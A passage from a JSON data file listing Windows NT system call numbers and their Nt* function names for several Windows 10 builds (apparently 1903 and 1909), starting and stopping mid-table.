\"NtQueryBootEntryOrder\", \"313\": \"NtQueryBootOptions\", \"314\": \"NtQueryDebugFilterState\", \"315\": \"NtQueryDirectoryFileEx\", \"316\": \"NtQueryDirectoryObject\", \"317\": \"NtQueryDriverEntryOrder\", \"318\": \"NtQueryEaFile\", \"319\": \"NtQueryFullAttributesFile\", \"320\": \"NtQueryInformationAtom\", \"321\": \"NtQueryInformationByName\", \"322\": \"NtQueryInformationEnlistment\", \"323\": \"NtQueryInformationJobObject\", \"324\": \"NtQueryInformationPort\", \"325\": \"NtQueryInformationResourceManager\", \"326\": \"NtQueryInformationTransaction\", \"327\": \"NtQueryInformationTransactionManager\", \"328\": \"NtQueryInformationWorkerFactory\", \"329\": \"NtQueryInstallUILanguage\", \"330\": \"NtQueryIntervalProfile\", \"331\": \"NtQueryIoCompletion\", \"332\": \"NtQueryLicenseValue\", \"333\": \"NtQueryMultipleValueKey\", \"334\": \"NtQueryMutant\", \"335\": \"NtQueryOpenSubKeys\", \"336\": \"NtQueryOpenSubKeysEx\", \"337\": \"NtQueryPortInformationProcess\", \"338\": \"NtQueryQuotaInformationFile\", \"339\": \"NtQuerySecurityAttributesToken\", \"340\": \"NtQuerySecurityObject\", \"341\": \"NtQuerySecurityPolicy\", \"342\": \"NtQuerySemaphore\", \"343\": \"NtQuerySymbolicLinkObject\", \"344\": \"NtQuerySystemEnvironmentValue\", \"345\": \"NtQuerySystemEnvironmentValueEx\", \"346\": \"NtQuerySystemInformationEx\", \"347\": \"NtQueryTimerResolution\", \"348\": \"NtQueryWnfStateData\", \"349\": \"NtQueryWnfStateNameInformation\", \"350\": \"NtQueueApcThreadEx\", \"351\": \"NtRaiseException\", \"352\": \"NtRaiseHardError\", \"353\": \"NtReadOnlyEnlistment\", \"354\": \"NtRecoverEnlistment\", \"355\": \"NtRecoverResourceManager\", \"356\": \"NtRecoverTransactionManager\", \"357\": \"NtRegisterProtocolAddressInformation\", \"358\": \"NtRegisterThreadTerminatePort\", \"359\": \"NtReleaseKeyedEvent\", \"360\": \"NtReleaseWorkerFactoryWorker\", \"361\": \"NtRemoveIoCompletionEx\", \"362\": \"NtRemoveProcessDebug\", \"363\": \"NtRenameKey\", \"364\": \"NtRenameTransactionManager\", \"365\": \"NtReplaceKey\", \"366\": \"NtReplacePartitionUnit\", \"367\": \"NtReplyWaitReplyPort\", \"368\": \"NtRequestPort\", \"369\": \"NtResetEvent\", \"370\": \"NtResetWriteWatch\", \"371\": \"NtRestoreKey\", \"372\": \"NtResumeProcess\", \"373\": \"NtRevertContainerImpersonation\", \"374\": \"NtRollbackComplete\", \"375\": \"NtRollbackEnlistment\", \"376\": \"NtRollbackRegistryTransaction\", \"377\": \"NtRollbackTransaction\", \"378\": \"NtRollforwardTransactionManager\", \"379\": \"NtSaveKey\", \"380\": \"NtSaveKeyEx\", \"381\": \"NtSaveMergedKeys\", \"382\": \"NtSecureConnectPort\", \"383\": \"NtSerializeBoot\", \"384\": \"NtSetBootEntryOrder\", \"385\": \"NtSetBootOptions\", \"386\": \"NtSetCachedSigningLevel\", \"387\": \"NtSetCachedSigningLevel2\", \"388\": \"NtSetContextThread\", \"389\": \"NtSetDebugFilterState\", \"390\": \"NtSetDefaultHardErrorPort\", \"391\": \"NtSetDefaultLocale\", \"392\": \"NtSetDefaultUILanguage\", \"393\": \"NtSetDriverEntryOrder\", \"394\": \"NtSetEaFile\", \"395\": \"NtSetHighEventPair\", \"396\": \"NtSetHighWaitLowEventPair\", \"397\": \"NtSetIRTimer\", \"398\": \"NtSetInformationDebugObject\", \"399\": \"NtSetInformationEnlistment\", \"400\": \"NtSetInformationJobObject\", \"401\": \"NtSetInformationKey\", \"402\": \"NtSetInformationResourceManager\", \"403\": \"NtSetInformationSymbolicLink\", \"404\": \"NtSetInformationToken\", \"405\": \"NtSetInformationTransaction\", \"406\": \"NtSetInformationTransactionManager\", \"407\": \"NtSetInformationVirtualMemory\", \"408\": \"NtSetInformationWorkerFactory\", \"409\": \"NtSetIntervalProfile\", \"410\": \"NtSetIoCompletion\", \"411\": \"NtSetIoCompletionEx\", \"412\": \"NtSetLdtEntries\", \"413\": \"NtSetLowEventPair\", \"414\": \"NtSetLowWaitHighEventPair\", \"415\": \"NtSetQuotaInformationFile\", \"416\": \"NtSetSecurityObject\", \"417\": \"NtSetSystemEnvironmentValue\", \"418\": \"NtSetSystemEnvironmentValueEx\", \"419\": \"NtSetSystemInformation\", \"420\": \"NtSetSystemPowerState\", \"421\": \"NtSetSystemTime\", \"422\": \"NtSetThreadExecutionState\", \"423\": \"NtSetTimer2\", \"424\": \"NtSetTimerEx\", \"425\": \"NtSetTimerResolution\", \"426\": \"NtSetUuidSeed\", \"427\": \"NtSetVolumeInformationFile\", \"428\": \"NtSetWnfProcessNotificationEvent\", \"429\": \"NtShutdownSystem\", \"430\": \"NtShutdownWorkerFactory\", \"431\": \"NtSignalAndWaitForSingleObject\", \"432\": \"NtSinglePhaseReject\", \"433\": \"NtStartProfile\", \"434\": \"NtStopProfile\", \"435\": \"NtSubscribeWnfStateChange\", \"436\": \"NtSuspendProcess\", \"437\": \"NtSuspendThread\", \"438\": \"NtSystemDebugControl\", \"439\": \"NtTerminateEnclave\", \"440\": \"NtTerminateJobObject\", \"441\": \"NtTestAlert\", \"442\": \"NtThawRegistry\", \"443\": \"NtThawTransactions\", \"444\": \"NtTraceControl\", \"445\": \"NtTranslateFilePath\", \"446\": \"NtUmsThreadYield\", \"447\": \"NtUnloadDriver\", \"448\": \"NtUnloadKey\", \"449\": \"NtUnloadKey2\", \"450\": \"NtUnloadKeyEx\", \"451\": \"NtUnlockFile\", \"452\": \"NtUnlockVirtualMemory\", \"453\": \"NtUnmapViewOfSectionEx\", \"454\": \"NtUnsubscribeWnfStateChange\", \"455\": \"NtUpdateWnfStateData\", \"456\": \"NtVdmControl\", \"457\": \"NtWaitForAlertByThreadId\", \"458\": \"NtWaitForDebugEvent\", \"459\": \"NtWaitForKeyedEvent\", \"460\": \"NtWaitForWorkViaWorkerFactory\", \"461\": \"NtWaitHighEventPair\", \"462\": \"NtWaitLowEventPair\"}, \"1903\": {\"0\": \"NtAccessCheck\", \"1\": \"NtWorkerFactoryWorkerReady\", \"2\": \"NtAcceptConnectPort\", \"3\": \"NtMapUserPhysicalPagesScatter\", \"4\": \"NtWaitForSingleObject\", \"5\": \"NtCallbackReturn\", \"6\": \"NtReadFile\", \"7\": \"NtDeviceIoControlFile\", \"8\": \"NtWriteFile\", \"9\": \"NtRemoveIoCompletion\", \"10\": \"NtReleaseSemaphore\", \"11\": \"NtReplyWaitReceivePort\", \"12\": \"NtReplyPort\", \"13\": \"NtSetInformationThread\", \"14\": \"NtSetEvent\", \"15\": \"NtClose\", \"16\": \"NtQueryObject\", \"17\": \"NtQueryInformationFile\", \"18\": \"NtOpenKey\", \"19\": \"NtEnumerateValueKey\", \"20\": \"NtFindAtom\", \"21\": \"NtQueryDefaultLocale\", \"22\": \"NtQueryKey\", \"23\": \"NtQueryValueKey\", \"24\": \"NtAllocateVirtualMemory\", \"25\": \"NtQueryInformationProcess\", \"26\": \"NtWaitForMultipleObjects32\", \"27\": \"NtWriteFileGather\", \"28\": \"NtSetInformationProcess\", \"29\": \"NtCreateKey\", \"30\": \"NtFreeVirtualMemory\", \"31\": \"NtImpersonateClientOfPort\", \"32\": \"NtReleaseMutant\", \"33\": \"NtQueryInformationToken\", \"34\": \"NtRequestWaitReplyPort\", \"35\": \"NtQueryVirtualMemory\", \"36\": \"NtOpenThreadToken\", \"37\": \"NtQueryInformationThread\", \"38\": \"NtOpenProcess\", \"39\": \"NtSetInformationFile\", \"40\": \"NtMapViewOfSection\", \"41\": \"NtAccessCheckAndAuditAlarm\", \"42\": \"NtUnmapViewOfSection\", \"43\": \"NtReplyWaitReceivePortEx\", \"44\": \"NtTerminateProcess\", \"45\": \"NtSetEventBoostPriority\", \"46\": \"NtReadFileScatter\", \"47\": \"NtOpenThreadTokenEx\", \"48\": \"NtOpenProcessTokenEx\", \"49\": \"NtQueryPerformanceCounter\", \"50\": \"NtEnumerateKey\", \"51\": \"NtOpenFile\", \"52\": \"NtDelayExecution\", \"53\": \"NtQueryDirectoryFile\", \"54\": \"NtQuerySystemInformation\", \"55\": \"NtOpenSection\", \"56\": \"NtQueryTimer\", \"57\": \"NtFsControlFile\", \"58\": \"NtWriteVirtualMemory\", \"59\": \"NtCloseObjectAuditAlarm\", \"60\": \"NtDuplicateObject\", \"61\": \"NtQueryAttributesFile\", \"62\": \"NtClearEvent\", \"63\": \"NtReadVirtualMemory\", \"64\": \"NtOpenEvent\", \"65\": \"NtAdjustPrivilegesToken\", \"66\": \"NtDuplicateToken\", \"67\": \"NtContinue\", \"68\": \"NtQueryDefaultUILanguage\", \"69\": \"NtQueueApcThread\", \"70\": \"NtYieldExecution\", \"71\": \"NtAddAtom\", \"72\": \"NtCreateEvent\", \"73\": \"NtQueryVolumeInformationFile\", \"74\": \"NtCreateSection\", \"75\": \"NtFlushBuffersFile\", \"76\": \"NtApphelpCacheControl\", \"77\": \"NtCreateProcessEx\", \"78\": \"NtCreateThread\", \"79\": \"NtIsProcessInJob\", \"80\": \"NtProtectVirtualMemory\", \"81\": \"NtQuerySection\", \"82\": \"NtResumeThread\", \"83\": \"NtTerminateThread\", \"84\": \"NtReadRequestData\", \"85\": \"NtCreateFile\", \"86\": \"NtQueryEvent\", \"87\": \"NtWriteRequestData\", \"88\": \"NtOpenDirectoryObject\", \"89\": \"NtAccessCheckByTypeAndAuditAlarm\", \"90\": \"NtQuerySystemTime\", \"91\": \"NtWaitForMultipleObjects\", \"92\": \"NtSetInformationObject\", \"93\": \"NtCancelIoFile\", \"94\": \"NtTraceEvent\", \"95\": \"NtPowerInformation\", \"96\": \"NtSetValueKey\", \"97\": \"NtCancelTimer\", \"98\": \"NtSetTimer\", \"99\": \"NtAccessCheckByType\", \"100\": \"NtAccessCheckByTypeResultList\", \"101\": \"NtAccessCheckByTypeResultListAndAuditAlarm\", \"102\": \"NtAccessCheckByTypeResultListAndAuditAlarmByHandle\", \"103\": \"NtAcquireProcessActivityReference\", \"104\": \"NtAddAtomEx\", \"105\": \"NtAddBootEntry\", \"106\": \"NtAddDriverEntry\", \"107\": \"NtAdjustGroupsToken\", \"108\": \"NtAdjustTokenClaimsAndDeviceGroups\", \"109\": \"NtAlertResumeThread\", \"110\": \"NtAlertThread\", \"111\": \"NtAlertThreadByThreadId\", \"112\": \"NtAllocateLocallyUniqueId\", \"113\": \"NtAllocateReserveObject\", \"114\": \"NtAllocateUserPhysicalPages\", \"115\": \"NtAllocateUuids\", \"116\": \"NtAllocateVirtualMemoryEx\", \"117\": \"NtAlpcAcceptConnectPort\", \"118\": \"NtAlpcCancelMessage\", \"119\": \"NtAlpcConnectPort\", \"120\": \"NtAlpcConnectPortEx\", \"121\": \"NtAlpcCreatePort\", \"122\": \"NtAlpcCreatePortSection\", \"123\": \"NtAlpcCreateResourceReserve\", \"124\": \"NtAlpcCreateSectionView\", \"125\": \"NtAlpcCreateSecurityContext\", \"126\": \"NtAlpcDeletePortSection\", \"127\": \"NtAlpcDeleteResourceReserve\", \"128\": \"NtAlpcDeleteSectionView\", \"129\": \"NtAlpcDeleteSecurityContext\", \"130\": \"NtAlpcDisconnectPort\", \"131\": \"NtAlpcImpersonateClientContainerOfPort\", \"132\": \"NtAlpcImpersonateClientOfPort\", \"133\": \"NtAlpcOpenSenderProcess\", \"134\": \"NtAlpcOpenSenderThread\", \"135\": \"NtAlpcQueryInformation\", \"136\": \"NtAlpcQueryInformationMessage\", \"137\": \"NtAlpcRevokeSecurityContext\", \"138\": \"NtAlpcSendWaitReceivePort\", \"139\": \"NtAlpcSetInformation\", \"140\": \"NtAreMappedFilesTheSame\", \"141\": \"NtAssignProcessToJobObject\", \"142\": \"NtAssociateWaitCompletionPacket\", \"143\": \"NtCallEnclave\", \"144\": \"NtCancelIoFileEx\", \"145\": \"NtCancelSynchronousIoFile\", \"146\": \"NtCancelTimer2\", \"147\": \"NtCancelWaitCompletionPacket\", \"148\": \"NtCommitComplete\", \"149\": \"NtCommitEnlistment\", \"150\": \"NtCommitRegistryTransaction\", \"151\": \"NtCommitTransaction\", \"152\": \"NtCompactKeys\", \"153\": \"NtCompareObjects\", \"154\": \"NtCompareSigningLevels\", \"155\": \"NtCompareTokens\", \"156\": \"NtCompleteConnectPort\", \"157\": \"NtCompressKey\", \"158\": \"NtConnectPort\", \"159\": \"NtConvertBetweenAuxiliaryCounterAndPerformanceCounter\", \"160\": \"NtCreateCrossVmEvent\", \"161\": \"NtCreateDebugObject\", \"162\": \"NtCreateDirectoryObject\", \"163\": \"NtCreateDirectoryObjectEx\", \"164\": \"NtCreateEnclave\", \"165\": \"NtCreateEnlistment\", \"166\": \"NtCreateEventPair\", \"167\": \"NtCreateIRTimer\", \"168\": \"NtCreateIoCompletion\", \"169\": \"NtCreateJobObject\", \"170\": \"NtCreateJobSet\", \"171\": \"NtCreateKeyTransacted\", \"172\": \"NtCreateKeyedEvent\", \"173\": \"NtCreateLowBoxToken\", \"174\": \"NtCreateMailslotFile\", \"175\": \"NtCreateMutant\", \"176\": \"NtCreateNamedPipeFile\", \"177\": \"NtCreatePagingFile\", \"178\": \"NtCreatePartition\", \"179\": \"NtCreatePort\", \"180\": \"NtCreatePrivateNamespace\", \"181\": \"NtCreateProcess\", \"182\": \"NtCreateProfile\", \"183\": \"NtCreateProfileEx\", \"184\": \"NtCreateRegistryTransaction\", \"185\": \"NtCreateResourceManager\", \"186\": \"NtCreateSectionEx\", \"187\": \"NtCreateSemaphore\", \"188\": \"NtCreateSymbolicLinkObject\", \"189\": \"NtCreateThreadEx\", \"190\": \"NtCreateTimer\", \"191\": \"NtCreateTimer2\", \"192\": \"NtCreateToken\", \"193\": \"NtCreateTokenEx\", \"194\": \"NtCreateTransaction\", \"195\": \"NtCreateTransactionManager\", \"196\": \"NtCreateUserProcess\", \"197\": \"NtCreateWaitCompletionPacket\", \"198\": \"NtCreateWaitablePort\", \"199\": \"NtCreateWnfStateName\", \"200\": \"NtCreateWorkerFactory\", \"201\": \"NtDebugActiveProcess\", \"202\": \"NtDebugContinue\", \"203\": \"NtDeleteAtom\", \"204\": \"NtDeleteBootEntry\", \"205\": \"NtDeleteDriverEntry\", \"206\": \"NtDeleteFile\", \"207\": \"NtDeleteKey\", \"208\": \"NtDeleteObjectAuditAlarm\", \"209\": \"NtDeletePrivateNamespace\", \"210\": \"NtDeleteValueKey\", \"211\": \"NtDeleteWnfStateData\", \"212\": \"NtDeleteWnfStateName\", \"213\": \"NtDisableLastKnownGood\", \"214\": \"NtDisplayString\", \"215\": \"NtDrawText\", \"216\": \"NtEnableLastKnownGood\", \"217\": \"NtEnumerateBootEntries\", \"218\": \"NtEnumerateDriverEntries\", \"219\": \"NtEnumerateSystemEnvironmentValuesEx\", \"220\": \"NtEnumerateTransactionObject\", \"221\": \"NtExtendSection\", \"222\": \"NtFilterBootOption\", \"223\": \"NtFilterToken\", \"224\": \"NtFilterTokenEx\", \"225\": \"NtFlushBuffersFileEx\", \"226\": \"NtFlushInstallUILanguage\", \"227\": \"NtFlushInstructionCache\", \"228\": \"NtFlushKey\", \"229\": \"NtFlushProcessWriteBuffers\", \"230\": \"NtFlushVirtualMemory\", \"231\": \"NtFlushWriteBuffer\", \"232\": \"NtFreeUserPhysicalPages\", \"233\": \"NtFreezeRegistry\", \"234\": \"NtFreezeTransactions\", \"235\": \"NtGetCachedSigningLevel\", \"236\": \"NtGetCompleteWnfStateSubscription\", \"237\": \"NtGetContextThread\", \"238\": \"NtGetCurrentProcessorNumber\", \"239\": \"NtGetCurrentProcessorNumberEx\", \"240\": \"NtGetDevicePowerState\", \"241\": \"NtGetMUIRegistryInfo\", \"242\": \"NtGetNextProcess\", \"243\": \"NtGetNextThread\", \"244\": \"NtGetNlsSectionPtr\", \"245\": \"NtGetNotificationResourceManager\", \"246\": \"NtGetWriteWatch\", \"247\": \"NtImpersonateAnonymousToken\", \"248\": \"NtImpersonateThread\", \"249\": \"NtInitializeEnclave\", \"250\": \"NtInitializeNlsFiles\", \"251\": \"NtInitializeRegistry\", \"252\": \"NtInitiatePowerAction\", \"253\": \"NtIsSystemResumeAutomatic\", \"254\": \"NtIsUILanguageComitted\", \"255\": \"NtListenPort\", \"256\": \"NtLoadDriver\", \"257\": \"NtLoadEnclaveData\", \"258\": \"NtLoadKey\", \"259\": \"NtLoadKey2\", \"260\": \"NtLoadKeyEx\", \"261\": \"NtLockFile\", \"262\": \"NtLockProductActivationKeys\", \"263\": \"NtLockRegistryKey\", \"264\": \"NtLockVirtualMemory\", \"265\": \"NtMakePermanentObject\", \"266\": \"NtMakeTemporaryObject\", \"267\": \"NtManageHotPatch\", \"268\": \"NtManagePartition\", \"269\": \"NtMapCMFModule\", \"270\": \"NtMapUserPhysicalPages\", \"271\": \"NtMapViewOfSectionEx\", \"272\": \"NtModifyBootEntry\", \"273\": \"NtModifyDriverEntry\", \"274\": \"NtNotifyChangeDirectoryFile\", \"275\": \"NtNotifyChangeDirectoryFileEx\", \"276\": \"NtNotifyChangeKey\", \"277\": \"NtNotifyChangeMultipleKeys\", \"278\": \"NtNotifyChangeSession\", \"279\": \"NtOpenEnlistment\", \"280\": \"NtOpenEventPair\", \"281\": \"NtOpenIoCompletion\", \"282\": \"NtOpenJobObject\", \"283\": \"NtOpenKeyEx\", \"284\": \"NtOpenKeyTransacted\", \"285\": \"NtOpenKeyTransactedEx\", \"286\": \"NtOpenKeyedEvent\", \"287\": \"NtOpenMutant\", \"288\": \"NtOpenObjectAuditAlarm\", \"289\": \"NtOpenPartition\", \"290\": \"NtOpenPrivateNamespace\", \"291\": \"NtOpenProcessToken\", \"292\": \"NtOpenRegistryTransaction\", \"293\": \"NtOpenResourceManager\", \"294\": \"NtOpenSemaphore\", \"295\": \"NtOpenSession\", \"296\": \"NtOpenSymbolicLinkObject\", \"297\": \"NtOpenThread\", \"298\": \"NtOpenTimer\", \"299\": \"NtOpenTransaction\", \"300\": \"NtOpenTransactionManager\", \"301\": \"NtPlugPlayControl\", \"302\": \"NtPrePrepareComplete\", \"303\": \"NtPrePrepareEnlistment\", \"304\": \"NtPrepareComplete\", \"305\": \"NtPrepareEnlistment\", \"306\": \"NtPrivilegeCheck\", \"307\": \"NtPrivilegeObjectAuditAlarm\", \"308\": \"NtPrivilegedServiceAuditAlarm\", \"309\": \"NtPropagationComplete\", \"310\": \"NtPropagationFailed\", \"311\": \"NtPulseEvent\", \"312\": \"NtQueryAuxiliaryCounterFrequency\", \"313\": \"NtQueryBootEntryOrder\", \"314\": \"NtQueryBootOptions\", \"315\": \"NtQueryDebugFilterState\", \"316\": \"NtQueryDirectoryFileEx\", \"317\": \"NtQueryDirectoryObject\", \"318\": \"NtQueryDriverEntryOrder\", \"319\": \"NtQueryEaFile\", \"320\": \"NtQueryFullAttributesFile\", \"321\": \"NtQueryInformationAtom\", \"322\": \"NtQueryInformationByName\", \"323\": \"NtQueryInformationEnlistment\", \"324\": \"NtQueryInformationJobObject\", \"325\": \"NtQueryInformationPort\", \"326\": \"NtQueryInformationResourceManager\", \"327\": \"NtQueryInformationTransaction\", \"328\": \"NtQueryInformationTransactionManager\", \"329\": \"NtQueryInformationWorkerFactory\", \"330\": \"NtQueryInstallUILanguage\", \"331\": \"NtQueryIntervalProfile\", \"332\": \"NtQueryIoCompletion\", \"333\": \"NtQueryLicenseValue\", \"334\": \"NtQueryMultipleValueKey\", \"335\": \"NtQueryMutant\", \"336\": \"NtQueryOpenSubKeys\", \"337\": \"NtQueryOpenSubKeysEx\", \"338\": \"NtQueryPortInformationProcess\", \"339\": \"NtQueryQuotaInformationFile\", \"340\": \"NtQuerySecurityAttributesToken\", \"341\": \"NtQuerySecurityObject\", \"342\": \"NtQuerySecurityPolicy\", \"343\": \"NtQuerySemaphore\", \"344\": \"NtQuerySymbolicLinkObject\", \"345\": \"NtQuerySystemEnvironmentValue\", \"346\": \"NtQuerySystemEnvironmentValueEx\", \"347\": \"NtQuerySystemInformationEx\", \"348\": \"NtQueryTimerResolution\", \"349\": \"NtQueryWnfStateData\", \"350\": \"NtQueryWnfStateNameInformation\", \"351\": \"NtQueueApcThreadEx\", \"352\": \"NtRaiseException\", \"353\": \"NtRaiseHardError\", \"354\": \"NtReadOnlyEnlistment\", \"355\": \"NtRecoverEnlistment\", \"356\": \"NtRecoverResourceManager\", \"357\": \"NtRecoverTransactionManager\", \"358\": \"NtRegisterProtocolAddressInformation\", \"359\": \"NtRegisterThreadTerminatePort\", \"360\": \"NtReleaseKeyedEvent\", \"361\": \"NtReleaseWorkerFactoryWorker\", \"362\": \"NtRemoveIoCompletionEx\", \"363\": \"NtRemoveProcessDebug\", \"364\": \"NtRenameKey\", \"365\": \"NtRenameTransactionManager\", \"366\": \"NtReplaceKey\", \"367\": \"NtReplacePartitionUnit\", \"368\": \"NtReplyWaitReplyPort\", \"369\": \"NtRequestPort\", \"370\": \"NtResetEvent\", \"371\": \"NtResetWriteWatch\", \"372\": \"NtRestoreKey\", \"373\": \"NtResumeProcess\", \"374\": \"NtRevertContainerImpersonation\", \"375\": \"NtRollbackComplete\", \"376\": \"NtRollbackEnlistment\", \"377\": \"NtRollbackRegistryTransaction\", \"378\": \"NtRollbackTransaction\", \"379\": \"NtRollforwardTransactionManager\", \"380\": \"NtSaveKey\", \"381\": \"NtSaveKeyEx\", \"382\": \"NtSaveMergedKeys\", \"383\": \"NtSecureConnectPort\", \"384\": \"NtSerializeBoot\", \"385\": \"NtSetBootEntryOrder\", \"386\": \"NtSetBootOptions\", \"387\": \"NtSetCachedSigningLevel\", \"388\": \"NtSetCachedSigningLevel2\", \"389\": \"NtSetContextThread\", \"390\": \"NtSetDebugFilterState\", \"391\": \"NtSetDefaultHardErrorPort\", \"392\": \"NtSetDefaultLocale\", \"393\": \"NtSetDefaultUILanguage\", \"394\": \"NtSetDriverEntryOrder\", \"395\": \"NtSetEaFile\", \"396\": \"NtSetHighEventPair\", \"397\": \"NtSetHighWaitLowEventPair\", \"398\": \"NtSetIRTimer\", \"399\": \"NtSetInformationDebugObject\", \"400\": \"NtSetInformationEnlistment\", \"401\": \"NtSetInformationJobObject\", \"402\": \"NtSetInformationKey\", \"403\": \"NtSetInformationResourceManager\", \"404\": \"NtSetInformationSymbolicLink\", \"405\": \"NtSetInformationToken\", \"406\": \"NtSetInformationTransaction\", \"407\": \"NtSetInformationTransactionManager\", \"408\": \"NtSetInformationVirtualMemory\", \"409\": \"NtSetInformationWorkerFactory\", \"410\": \"NtSetIntervalProfile\", \"411\": \"NtSetIoCompletion\", \"412\": \"NtSetIoCompletionEx\", \"413\": \"NtSetLdtEntries\", \"414\": \"NtSetLowEventPair\", \"415\": \"NtSetLowWaitHighEventPair\", \"416\": \"NtSetQuotaInformationFile\", \"417\": \"NtSetSecurityObject\", \"418\": \"NtSetSystemEnvironmentValue\", \"419\": \"NtSetSystemEnvironmentValueEx\", \"420\": \"NtSetSystemInformation\", \"421\": \"NtSetSystemPowerState\", \"422\": \"NtSetSystemTime\", \"423\": \"NtSetThreadExecutionState\", \"424\": \"NtSetTimer2\", \"425\": \"NtSetTimerEx\", \"426\": \"NtSetTimerResolution\", \"427\": \"NtSetUuidSeed\", \"428\": \"NtSetVolumeInformationFile\", \"429\": \"NtSetWnfProcessNotificationEvent\", \"430\": \"NtShutdownSystem\", \"431\": \"NtShutdownWorkerFactory\", \"432\": \"NtSignalAndWaitForSingleObject\", \"433\": \"NtSinglePhaseReject\", \"434\": \"NtStartProfile\", \"435\": \"NtStopProfile\", \"436\": \"NtSubscribeWnfStateChange\", \"437\": \"NtSuspendProcess\", \"438\": \"NtSuspendThread\", \"439\": \"NtSystemDebugControl\", \"440\": \"NtTerminateEnclave\", \"441\": \"NtTerminateJobObject\", \"442\": \"NtTestAlert\", \"443\": \"NtThawRegistry\", \"444\": \"NtThawTransactions\", \"445\": \"NtTraceControl\", \"446\": \"NtTranslateFilePath\", \"447\": \"NtUmsThreadYield\", \"448\": \"NtUnloadDriver\", \"449\": \"NtUnloadKey\", \"450\": \"NtUnloadKey2\", \"451\": \"NtUnloadKeyEx\", \"452\": \"NtUnlockFile\", \"453\": \"NtUnlockVirtualMemory\", \"454\": \"NtUnmapViewOfSectionEx\", \"455\": \"NtUnsubscribeWnfStateChange\", \"456\": \"NtUpdateWnfStateData\", \"457\": \"NtVdmControl\", \"458\": \"NtWaitForAlertByThreadId\", \"459\": \"NtWaitForDebugEvent\", \"460\": \"NtWaitForKeyedEvent\", \"461\": \"NtWaitForWorkViaWorkerFactory\", \"462\": \"NtWaitHighEventPair\", \"463\": \"NtWaitLowEventPair\"}, \"1909\": {\"0\": \"NtAccessCheck\", \"1\": \"NtWorkerFactoryWorkerReady\", \"2\": \"NtAcceptConnectPort\", \"3\": \"NtMapUserPhysicalPagesScatter\", \"4\": \"NtWaitForSingleObject\", \"5\": \"NtCallbackReturn\", \"6\": \"NtReadFile\", \"7\": \"NtDeviceIoControlFile\", \"8\": \"NtWriteFile\", \"9\": \"NtRemoveIoCompletion\", \"10\": \"NtReleaseSemaphore\", \"11\": \"NtReplyWaitReceivePort\", \"12\": \"NtReplyPort\", \"13\": \"NtSetInformationThread\", \"14\": \"NtSetEvent\", \"15\": \"NtClose\", \"16\": \"NtQueryObject\", \"17\": \"NtQueryInformationFile\", \"18\": \"NtOpenKey\", \"19\": \"NtEnumerateValueKey\", \"20\": \"NtFindAtom\", \"21\": \"NtQueryDefaultLocale\", \"22\": \"NtQueryKey\", \"23\": \"NtQueryValueKey\", \"24\": \"NtAllocateVirtualMemory\", \"25\": \"NtQueryInformationProcess\", \"26\": \"NtWaitForMultipleObjects32\", \"27\": \"NtWriteFileGather\", \"28\": \"NtSetInformationProcess\", \"29\": \"NtCreateKey\", \"30\": \"NtFreeVirtualMemory\", \"31\": \"NtImpersonateClientOfPort\", \"32\": \"NtReleaseMutant\", \"33\": \"NtQueryInformationToken\", \"34\": \"NtRequestWaitReplyPort\", \"35\": \"NtQueryVirtualMemory\", \"36\": \"NtOpenThreadToken\", \"37\": \"NtQueryInformationThread\", \"38\": \"NtOpenProcess\", \"39\": \"NtSetInformationFile\", \"40\": \"NtMapViewOfSection\", \"41\": \"NtAccessCheckAndAuditAlarm\", \"42\": \"NtUnmapViewOfSection\", \"43\": \"NtReplyWaitReceivePortEx\", \"44\": \"NtTerminateProcess\", \"45\": \"NtSetEventBoostPriority\", \"46\": \"NtReadFileScatter\", \"47\": \"NtOpenThreadTokenEx\", \"48\": \"NtOpenProcessTokenEx\", \"49\": \"NtQueryPerformanceCounter\", \"50\": \"NtEnumerateKey\", \"51\": \"NtOpenFile\", \"52\": \"NtDelayExecution\", \"53\": \"NtQueryDirectoryFile\", \"54\": \"NtQuerySystemInformation\", \"55\": \"NtOpenSection\", \"56\": \"NtQueryTimer\", \"57\": \"NtFsControlFile\", \"58\": \"NtWriteVirtualMemory\", \"59\": \"NtCloseObjectAuditAlarm\", \"60\": \"NtDuplicateObject\", \"61\": \"NtQueryAttributesFile\", \"62\": \"NtClearEvent\", \"63\": \"NtReadVirtualMemory\", \"64\": \"NtOpenEvent\", \"65\": \"NtAdjustPrivilegesToken\", \"66\": \"NtDuplicateToken\", \"67\": \"NtContinue\", \"68\": \"NtQueryDefaultUILanguage\", \"69\": \"NtQueueApcThread\", \"70\": \"NtYieldExecution\", \"71\": \"NtAddAtom\", \"72\": \"NtCreateEvent\", \"73\": \"NtQueryVolumeInformationFile\", \"74\": \"NtCreateSection\", \"75\": \"NtFlushBuffersFile\", \"76\": \"NtApphelpCacheControl\", \"77\": \"NtCreateProcessEx\", \"78\": \"NtCreateThread\", \"79\": \"NtIsProcessInJob\", \"80\": \"NtProtectVirtualMemory\", \"81\": \"NtQuerySection\", \"82\": \"NtResumeThread\", \"83\": \"NtTerminateThread\", \"84\": \"NtReadRequestData\", \"85\": \"NtCreateFile\", \"86\": \"NtQueryEvent\", \"87\": \"NtWriteRequestData\", \"88\": \"NtOpenDirectoryObject\", \"89\": \"NtAccessCheckByTypeAndAuditAlarm\", \"90\": \"NtQuerySystemTime\", \"91\": \"NtWaitForMultipleObjects\", \"92\": \"NtSetInformationObject\", \"93\": \"NtCancelIoFile\", \"94\": \"NtTraceEvent\", \"95\": \"NtPowerInformation\", \"96\": \"NtSetValueKey\", \"97\": \"NtCancelTimer\", \"98\": \"NtSetTimer\", \"99\": \"NtAccessCheckByType\", \"100\": \"NtAccessCheckByTypeResultList\", \"101\": \"NtAccessCheckByTypeResultListAndAuditAlarm\", \"102\": \"NtAccessCheckByTypeResultListAndAuditAlarmByHandle\", \"103\": \"NtAcquireProcessActivityReference\", \"104\": \"NtAddAtomEx\", \"105\": \"NtAddBootEntry\", \"106\": \"NtAddDriverEntry\", \"107\": \"NtAdjustGroupsToken\", \"108\": \"NtAdjustTokenClaimsAndDeviceGroups\", \"109\": \"NtAlertResumeThread\", \"110\": \"NtAlertThread\", \"111\": \"NtAlertThreadByThreadId\", \"112\": \"NtAllocateLocallyUniqueId\", \"113\": \"NtAllocateReserveObject\", \"114\": \"NtAllocateUserPhysicalPages\", \"115\": \"NtAllocateUuids\", \"116\": \"NtAllocateVirtualMemoryEx\", \"117\": \"NtAlpcAcceptConnectPort\", \"118\": \"NtAlpcCancelMessage\", \"119\": \"NtAlpcConnectPort\", \"120\": \"NtAlpcConnectPortEx\", \"121\": \"NtAlpcCreatePort\", \"122\": \"NtAlpcCreatePortSection\", \"123\": \"NtAlpcCreateResourceReserve\", \"124\": \"NtAlpcCreateSectionView\", \"125\": \"NtAlpcCreateSecurityContext\", \"126\": \"NtAlpcDeletePortSection\", 